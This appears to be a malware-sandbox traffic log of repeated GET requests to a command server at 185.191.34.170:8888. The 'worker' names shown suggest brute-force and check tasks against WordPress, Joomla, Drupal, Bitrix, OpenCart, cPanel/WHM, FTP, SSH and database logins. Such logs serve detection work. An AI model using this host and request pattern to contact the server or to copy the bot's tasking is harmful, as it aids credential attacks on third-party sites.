Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpChk&v=new HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpChk&v=new HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpChk&v=new HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpChk&v=new HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpChk&v=new HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpInst HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpInst HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpInst HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpInst HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpInst HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=drupalChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=drupalChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=drupalChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=drupalChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=drupalChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=drupalBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=drupalBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=drupalBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=drupalBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=drupalBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=OCartChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=OCartChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=OCartChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=OCartChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=OCartChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=OCartBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=OCartBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftpChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftpChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=OCartBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=OCartBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=backup&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=OCartBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=backup&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ssh_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=backup&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ssh_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=backup&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=backup&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftpChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=mysql_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=mysql_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftpChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftpChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ssh_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=postgres_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
